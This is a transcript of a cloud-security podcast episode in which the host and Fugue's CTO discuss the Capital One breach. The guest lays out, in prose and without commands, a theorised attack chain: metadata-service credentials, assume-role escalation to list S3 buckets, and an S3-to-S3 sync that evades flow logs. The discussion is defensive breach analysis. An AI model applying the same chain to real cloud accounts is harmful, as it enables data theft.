Reverse Engineering the Capital One Breach with Josh Stella

Episode Summary

Cloud security makes Josh Stella tick. In 2013, he founded Fugue, a company that brings native security and simplified operations to cloud architecture. Join Corey and Josh as they discuss why Fugue is called Fugue, how the approach hackers take has changed in recent years, why cloud security is actually more of a physics and biology problem than a technology problem, the recent Capital One data breach, how it likely happened, why the bank didn’t necessarily do anything wrong, why cloud security should be automated, and more.

Episode Show Notes & Transcript

About Josh Stella

Josh Stella is co-founder and CTO of Fugue, the company delivering autonomous cloud infrastructure security and compliance. Previously, Josh was a Principal Solutions Architect at Amazon Web Services (AWS), where he supported customers in the area of national security. Prior to Fugue, Josh served as CTO for a technology startup and, for 25 years, in numerous other IT leadership and technical roles.

Links Referenced

Twitter: @joshstella
LinkedIn: linkedin.com/in/josh-stella-949a9711
www.fugue.co

Transcript
Announcer: Hello and welcome to Screaming in the Cloud with your host, cloud economist Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.

Corey: This week’s episode of Screaming in the Cloud is sponsored by X-Team. X-Team is a 100% remote company that helps other remote companies scale their development teams. You can live anywhere you like and enjoy a life of freedom while working on first-class company environments. I gotta say, I’m pretty skeptical of “remote work” environments, so I got on the phone with these folks for about half an hour, and, let me level with you: I’ve gotta say I believe in what they’re doing and their story is compelling. If I didn’t believe that, I promise you I wouldn’t say it. If you would like to work for a company that doesn’t require that you live in San Francisco, take my advice and check out X-Team. They’re hiring both developers and devops engineers. Check them out at the letter x dash Team dot com slash cloud. That’s x-team.com/cloud to learn more. Thank you for sponsoring this ridiculous podcast.

Welcome to screaming in the cloud. I'm Corey Quinn. I'm joined this week by Josh Stella, founder and CTO of a company called Fugue. Josh, welcome to the show.

Josh: Thanks Corey. It's great to be here.

Corey: Let's start at the very beginning. What is a fugue? My awareness of the company starts and stops with a T-shirt I got at an event a couple of years back. It's glorious, people have general trouble reading it, it's very nice once you look at the abstract design and then eventually realize it says the word "fugue" in a very stylistic way.

Josh: There is a backstory there. A fugue is a compositional style in music and particularly fugues are constructed out of relatively simple musical phrases that evolve over time and interleave and have produced some of the most sophisticated, beautiful pieces of music ever written. What made me think of it for the company in the software we were writing was a book published in the 1980s that made an impression on me as a young person called Gödel, Escher, Bach: An Eternal Golden Braid by Douglas Hofstadter, which I highly recommend. It's about the nature of complex systems arising out of simple systems. And I wasn't quite sure it would be a good company name, but my colleagues, when I brought it up kind of insisted, so Fugue we are.

Corey: Excellent, and Fugue you shall remain. At a high level what your company does to my understanding, and please correct me loudly and energetically if I'm wrong, but you focus on cloud governance specifically with an eye towards security and compliance.

Josh: Yes, that's true. I would say cloud governance focused primarily as you said, on security and compliance. The way we do that is very different than others who are thinking about security. From Fugue's perspective, the cloud is itself software defined, which means that security is a software engineering problem, not a security analysis problem. We actually create a complete model of the entire application or system that's being run in the cloud and then we can compute against that. We can compute things like, is it in compliance with certain compliance regimes like HIPAA or CIS or NIST? But we can also compute things like has it changed over time? Has it mutated in dangerous ways from one moment to the next? That's the space we're in, our approach is a little different.

Corey: Understood. And security in the cloud is something that no one really pays attention to and it's not particularly interesting because nothing much ever really happens in that space. In a completely unrelated topic, as at the time of this recording, a couple of weeks back, there was a Capital One breach that puts a lie to everything that I just said. And you wrote a technical analysis of how that attack may have been pulled off that aligns almost perfectly with my own assessment of it. Can you take people through the high level of what happened and what you suspect occurred?

Josh: Absolutely, and I think the keyword there is may. We only have a certain number of data. Largely I focused on the DOJ complaint because that's an official document. And I did look at the screenshots of the attacker's Twitter feed, although only after I tried to recreate the attacks. I'm gonna describe it from a technical perspective, and if you want me to, I can go back and describe it more in layman's terms. I think I've come up with a decent analogy for that. And this is a maybe. Some things we know about the attack from the DOJ complaint to the degree that that's accurate, but it's not enough to really piece the whole picture together. I made some assumptions and I'll try to highlight those as I touch on them. And let me start by saying I have really good friends both at AWS and Capital One that are absolutely brilliant engineers, and I think both as organizations do a phenomenal job. This is stuff that can happen to just about anyone.

Corey: I would absolutely agree with that. In fact, taking a look at what we've seen far, there's been a lot of noise around this that doesn't necessarily seem to bear itself out. And a lot of people of course, because it's the internet speculating wildly and passing it off as fact.

Josh: Oh yes. Most of what I'm seeing out there I think misses the most important points. And I hope your listeners get some value out of at least the things as somebody who's worked in cloud security and integrity for years now, I think there's some important things to notice that are largely getting ignored. My theory of the attack... And the way I did this is I came up with a theory and then I recreated this attack in my own environment against my own infrastructure. Not production Fugue infrastructure, structure, it actually would not have worked there, but against my own development environment. What we know from the DOJ complaint is there was a misconfigured firewall. We don't know what kind of firewall, we don't know what the misconfiguration was. And I think a lot of folks are conflating misconfigured firewall with the fact that an IAM role with WAF, which stands for web application firewall, was used. That may be true, but it also may not be true.

In my theory, there is another firewall, a traditional IP firewall that has a bad port. And we have heard from I think fairly credible sources that the attacker was scanning the internet for vulnerabilities. And that's the first point I'd like to make is in the old days, attackers would target organizations specifically and go look for vulnerabilities. Now that still happens, but what's happening most of the time is attackers have automated their looking for vulnerabilities and then they pick targets from those who are vulnerable. In this case it was Capital One, but it could have been Josh's Auto Repair, they just found a gap. They found the back door open in a firewall and started working from there. That might've been a security group that had a bad port open, it could have been another kind of firewall, but it appears that the attacker got access to likely an EC2 compute instance. And I say likely because there is a need to collect metadata off the metadata service and the hypervisor and to assume IAM roles. And that's most likely EC2.

I think that the attacker got in the back door, looked around and found exploitable EC2 instance, and then in her Twitter feed she says she used assume-role and this is where things really get interesting. Assume-role means taking on a different IAM identity. You've got this server and maybe it has an IAM identity that only allows it to do things like, oh I don't know, connect to a database. But once you're on that server, if that EC2 instance has itself IAM permissions to look at other IAM roles, you can go shopping for an identity that allows you to do more destructive things.

Let's assume for a moment, because we know Capital One are really good at this stuff, that that server's native IAM role, that EC2 instance's assigned IAM role didn't have things like list S3 buckets because that's a bad idea, right? You should know what S3 buckets you need to talk to and listing them is like getting a phone directory to where the data safes are. But if you could get into that EC2 instance and shop for an IAM role that did have S3 list and then assume that role, now you get a listing of those S3 buckets. I believe that was the next step.

And then once those buckets were identified in the DOJ complaint, they use some interesting and specific language. They say that there were four commands executed and in the fourth command, they describe it as a sync command. Now S3's API does not have a sync API end point, but the AWS CLI has a utility function called sync for S3. I suspect what happened is the attacker got into EC2, looked at the metadata service's credentials, used those escalated identity and permissions through identity, listed S3 buckets, and then synced those S3 buckets to another collection of S3 buckets. And of course. That would not send a lot of network traffic. It actually wouldn't send any network traffic over a VPC for things like VPC flow logs to catch it with all be S3 to S3 and largely invisible to traditional security tools. That's in a nutshell my theory of what happened.

Corey: I would almost take it a potential step further and wonder if once you wind up assuming a new role, you still wind up having credentials that are now able to do that. There's no restriction that I'm aware of that will only permit that credential set to be used from a certain location. Running this from somewhere completely removed from Capital One's portion of the internet from a host somewhere on the other side of the world, for example, would potentially have been able to do every bit as much of this without having full on access to an instance inside the Capital One environment. Is that your understanding?

Josh: Yes and no. Generally true. However, let's again assume that Capital One are highly competent. We know they are. When you define S3 permissions, you can actually limit that to VPC CIDR blocks that you choose. And assuming that they limited it to certain VPC CIDR blocks, the commands would have had to have come from those CIDR blocks. But I think the point here is that that protection didn't help. Those S3 buckets that things were synced to could have been in another account and that account needed nothing to do with that IAM role, it just needed public S3 buckets to shove data into.

Corey: Everything you say is completely plausible, that's more or less where your article starts and stops. That said though, from my perspective, it feels like there are additional parts of the story. For example, 127 days elapsed between the time that this data was exfiltrated and the time that Capital One was made aware of this by an external security researcher. There was apparently no auditing going on for strange behaviors such as listing 700 S3 buckets and then massive transfer of the contents of sensitive buckets. Am I mistaken on something there?

Josh: I don't think you're mistaken, but one of the hardest problems in cloud security is finding signal in noise. Let's break this down, what might have they detected? A listing of S3 buckets? Yeah, you'd find that command in the logs and so on. But the sync command is doing an S3 to S3 copy. Unlike a traditional data exfiltration, which would show up in the a VPC flow log or in the old world it would be hitting your perimeters of your network, that doesn't hit any perimeters. That is just a command and the data transfer happens behind the scenes, not in the virtualized network that you would be monitoring. Well, my educated instinct, let's say, is that this would be hard to detect. And given that she used both Tor and IPredator to cover her tracks, I strongly suspect the only reason she got caught and this gotten noticed is because she bragged about it.

Corey: And stored the exfiltrated data and tooling she used for this apparently in a GitHub account linked to her name.

Josh: Yeah. This feels like somebody who... I don't like to play psychologist, but somebody who wanted notoriety and I think that was the undoing. She mentions that in the Twitter thread. But what that means is if you are out there operating on the cloud and you're not very certain of how you have configured IAM and S3 and particularly IAM permissions to S3 on production instances, I suspect there are a lot of folks with this vulnerability. It's like in the lateral movement kind of attack that we've seen or evidence of lateral movement, but the lateral movement is through identity on the cloud because identity isn't just user identity, it's system component identity. And it almost forms a new kind of network. And I think it's that complex and that big a problem. We're going to have to come up with security tools. And I'm biased in this because this is part of what we do that considers IAM to be more like a network than just a set of usernames with authorizations.

Corey: One other area for intercepting this, even if it didn't stop the attack but would've flagged it before someone else had brought it to their attention, wouldn't in a relatively well managed environment have this level of sensitivity given that they are in fact a bank, isn't it sensible to say that they should have had something alarm whenever an EC2 instance role called an assumed-role API.

Josh: Well, sure. Doing that is easier said than done unless you have that complete picture of the infrastructure and you can detect all drifts. That's why we take that approach. Otherwise you're tending to look through big, long logs of change of mutation and trying to pluck out from that what looks scary, and that's a really hard problem. Let's rewind for a sec and talk about the fundamental benefits of cloud. It's not a data center, it's a moving surface. It is less like a bank vault, more like an aircraft carrier. You're building something that is constantly in motion and that means there's a flood of API calls going on all the time, every day if you're using it effectively. And that's a blessing because it allows us to build a systems that scale automatically, that operate at high speed to compete with others in whatever your businesses. I was talking to a customer the other day that they do five to 10 production pushes a day.

That really wasn't like that in the old days. I think it comes down to should things be caught? Yes. But what should be caught from that flood of information that is coming across the wire and the old approaches of looking for things that appear scary, just fail. You have to have an understanding of what the known good state of that infrastructure is and the ability to catch any drifts that occur to that infrastructure to elevate the actual changes above the normal functioning of the infrastructure so that you can put eyes on it. Or even better yet, our belief is those things should be automatically healed. That the attackers are automated, the defense needs to be automated. That's a long winded wandering answer. I apologize for that.

Corey: No, no trouble at all. Ostensibly, isn't the value proposition of both Macie and GuardDuty in different ways to identify anomalous behavior such as a EC2 instance that, "Oh, it's always been a firewall until now that is now listing S3 buckets and causing a whole bunch of object gets inputs?"

Josh: Yeah, I can't really speculate as to whether they were using those services and something got lost in the noise or if they weren't using those services. I mean that's what those services try to do-

Corey: Yeah, they could forgiven for not using Macie, they are a bank, but even a bank runs out of money sooner or later, and Macie is nowhere near affordable for any reasonable workload.

Josh: Yeah, fair. Yeah. I think there are other approaches. But I'm gonna go back to things like Macie and others, they're still trying to infer what matters. And I personally believe these systems can be made much more deterministic than that. That you don't need like fancy logic to pluck out the signal from the noise if you know what correct looks like. Things that alter from correct are always suspicious unless they're handled through a proper CICD tool chain. And again, I'll say the cloud is actually a big software computer, it's not a data center. And therefore you can use software engineering approaches like infrastructure as code and policy as code. And I think that's a much more successful way to deal with this kind of thing than trying to find needles in haystacks of data flying by.

Corey: This week’s episode is sponsored by CHAOSSEARCH. If you’ve ever tried managing Elasticsearch yourself, you know that it is of the Devil. You have to manage a series of instances, you have to potentially deal with a managed service. What if all that went away? CHAOSSEARCH does that. It winds up taking the data that lives in your S3 buckets and indexing that and providing an Elasticsearch compatible API. You don’t have to manage infrastructure, you don’t have to play stupid slap-and-tickle games with various licensing arrangements, fundamentally, you wind up dealing with a better user experience for roughly 80% less than you’ll spend on managing actual Elasticsearch. CHAOSSEARCH is one of those rare companies where I don’t just advertise for them, I actively recommend them to my clients because, fundamentally, they’re hitting it out of the park. To learn more, look at CHAOSSEARCH.io. CHAOSSEARCH is of course all in capital letters because despite CHAOSSEARCHING they cannot find the caps lock key to turn it off. My thanks to CHAOSSEARCH for sponsoring this ridiculous podcast.

Corey: There is another position to take as far as blaming people goes. Cause whenever something like this happens, the first thing everyone wants to know is exactly whose fault it was and how irresponsible and terrible they were. And I don't tend to give much credence to that. It's a natural human reaction, but having punitive responses inspires people to hide things. But there is an argument to be made that the current state of cloud security is such that there's more than any one person can hold in their head as a full time job, let alone the fact that most people are not security engineers.

They have a thing they're trying to do and security is part and parcel of that, but it's not their core objective in what they're doing. Understanding all of the nuances of how all these things interplay feels like it's an awfully heavy lift. Maybe not as much for a bank, but given that we've seen this spate of cloud security issues and Capital One is almost certainly not the only company out there as susceptible to something like this, it really does make someone wonder at what point do the providers themselves bear some level of responsibility for simplifying the stupefying complexity that is the security model?

Josh: Boy, you covered a lot of ground there. I'm going to go backwards. Why is it stupefyingly complex? It is stupefyingly complex because there are tons of features of the cloud. I remember back in the in the very early nineties when I was a a new Unix system administrator and I first got root access, I blew up my machine. I did. I got the arguments to a tar command backwards and I replaced the contents of the kernel file with an empty tape. Why could I do that? Should Sun Microsystems have prevented me from doing that? At the time I felt like it. But looking back, no. In fact, the beauty of these very rich and powerful systems is they allow humans to make lots of decisions and be clever. And with that comes risk. With that power comes risk. Will the cloud providers get better at showing people the sharp edges? I'm sure they will, they have over time. But I think this is a more fundamental problem than the cloud providers should do better or cloud customers shouldn't make mistakes.

I think this is actually a physics and biology problem. Human beings typically can only remember about seven discrete pieces of data. This is why phone numbers sans area code in the US were seven digits long. The average person can remember seven things. We are bad at specificity, we are bad at detailed memory. And when you look at one of these cloud environments, let's say, one of our customers might have 50,000 or so cloud resources, a resource being something like an EC2 instance or an S3 bucket. And when you look at all the ways you can configure those, each resource can be configured in thousands, tens of thousands, maybe hundreds of thousands of ways. And multiply those together.

That is not the kind of problem humans are good at solving. It just simply isn't. But we have these handy things called computers and this sixty-year-old practice called programming and software engineering that is very well-suited to this problem. I think the blame lies on our collective imagination to understand that the cloud is actually a big general purpose computer and it needs to be programmed like one and it needs to be automated, not just in terms of its scaling functions and business functions, but in terms of its security functions. That might've been a little too geeky and down in the weeds. I'll take another shot at it if you like.

Corey: No, I think that's an absolutely fair assessment. With great power does come great responsibility. I think that there's a responsibility to defend against sophisticated attacks like this. One thing that I've noticed across the internet in the wake of this has been, "Oh, she worked at Amazon back in 2016 on the S3 team, she must have used insider knowledge to pull this off." Well, you left Amazon. To my understanding, you used to be a principal solutions architect and you left before 2016 and in 2017 they had their S3 apocalypse and then rebuilt the entire system from the ground up. Plus, you've laid out a very convincing and very plausible way this could have been exploited that none of it required inside knowledge. It just required deep familiarity with the platforms and publicly exposed utilities.

Josh: Yeah. I can't know for sure. Apparently she worked on the S3 team, but my instinct is that that is bullshit. If that's not okay to say, I'll do something else but-

Corey: No, please. We'll keep it.

Josh: Okay. I think it's bullshit. I recreated this in about five hours, my theory of how this worked. I've been out of Amazon since 2013, I used no insider information to recreate this. I looked at APIs. I thought about it for a minute, actually for a few minutes, maybe a few hours over the course of doing it and pieced together a way to do this kind of attack. I think she was creative and you know what? So are a lot of people, we should be worried about that. The notion that an identity system, and most people when they hear identity, they think about my active directory user when I log into my machine, that's not what this is. This is the identity of components of the system that can completely circumvent the traditional network boundaries and that becomes a vector again for lateral movement. I don't think there was insider information used. I don't know, but none was needed.

Corey: Absolutely. This is the sort of sophisticated and clever attack that, for example, I would dream up. Maybe not to the same degree, certainly not with the ethical lapse, but there's nothing that's required from an inside baseball perspective on this and saying that, "Oh, it's obviously a failure of how Amazon hires people, that someone who worked there many years ago now did something awful." Theoretically if you were to go and turn evil and do something like this, I think there would be a whole hullabaloo made about the fact that once upon a time you worked there, so it must have been with inside knowledge you did all of these things, and I just think that's crap.

Josh: I think so too. Look, people like things to have a bow on them. They like to have something to point out and blame. Human beings in my experience are very uncomfortable with the idea that we're facing issues that are truly complex, that require a lot of thought, creativity and hard work to solve and instead look for some simple explanation. And I think that's one of a number I've heard. When actually for us to do something productive about this means really understanding what happened in an honest way. And I'm not claiming that my theory is perfectly correct or even, mostly correct. It's the best one I could come up with, but if nothing else, my theory and experiments have shown that that is a massive attack vector and people need a solution to that. I think it's pretty cheap to say, "Oh, this is an ex-AWSer," it could have been just about anyone.

Corey: It's also a bit insulting. Oh, no one could possibly understand AWS unless they worked there for years. Nonsense. Humans can understand anything. Nothing's impossible for a person to wrap their brain around. It just requires dedication and effort more than almost anything else.

Josh: Yeah, absolutely. I'll point back to the original use of the term hacker. It wasn't somebody who broke security walls down, it was somebody who did clever things in C or Lisp. People who are compelled to do creative things with computers get creative with computers. They use them in unintended ways and if you are a bad actor, this is what that looks like. If you're a good actor, you might make the next great application or secure an existing one or what have you. There's no easy answer to this.

Corey: And here's I think the most lingering question that we're faced with. Capital One may have their faults, but they don't hire stupid and they care and they pay attention to this because they know what's at stake. If they were in a situation to fall victim to this, how many other companies are too?

Josh: Every company that's running a digital computer, whether it's in a data center or on the cloud, Capital One does hire excellent people. One of my best friends and most brilliant programmers I know works there. We haven't spoken about this at all by the way. We talk more about things like Rushton Haskell. I know the quality of their team. Asking people to be perfect is unreasonable and I think the real question we have to be asking ourselves as an industry is how do we become resilient? Because perfection is not an option.

Corey: Exactly. And it can't be M&M security where once you break through the hard outer candy shell, everything inside is soft. Defense in depth is critical.

Josh: I would even go beyond that. I completely agree. There is no perimeter. Forget about that. That's gone. It's never really been there. Security is a collection of architectural decisions, it's not a technology you can layer on. And to get security right means understanding the system as a whole. I would argue that not just defense in depth, but defense at every level, all the way up and down the stack where you're doing your best to eliminate these vulnerabilities. And pretty clearly in this case, once that firewall was penetrated and the IAM role-assumption was possible, that was a pretty a soft middle. But I think that we need to think about this in terms of every layer of the stack and baking insecurity as an architectural practice and that is directly at odds in many cases with speed and efficiency. And again, I'm going to come back to, computer science has pretty good answers for this, people just aren't thinking about the problem that way.

Corey: I think you may absolutely be onto something here and I'm beginning to understand why it is that you started a company aimed at solving these problems. If people care more about what you have to say and want to see your thoughts, where can they find you?

Josh: Our company is at Fugue, F-U-G-U-E, .co, dot C-O. I'm joshstella on Twitter and if you want to reach out to me, I'm [email protected].

Corey: Thank you much for taking the time to speak with me today. I appreciate it.

Josh: Thanks Corey. It's been fun to talk to you.

Corey: Likewise. If you've enjoyed this episode, please leave us a positive review on iTunes. If you hated this episode, please leave us a positive review on iTunes. I'm Corey Quinn. This is Screaming in the Cloud.

Announcer: This has been this week's episode of Screaming in the Cloud. You can also find more Corey at screaminginthecloud.com or wherever fine snark is sold.

Announcer: This has been a HumblePod production. Stay humble.

Reverse Engineering the Capital One Breach with Josh Stella

Episode Summary

Episode Show Notes & Transcript

You might also like

Reliable Software by Default with Jeremy Edberg

See Why GenAI Workloads Are Breaking Observability with Wayne Segar

Presenting at re:Invent with Matt Berk and Bowen Wang

Get the Newsletter

Sponsor an Episode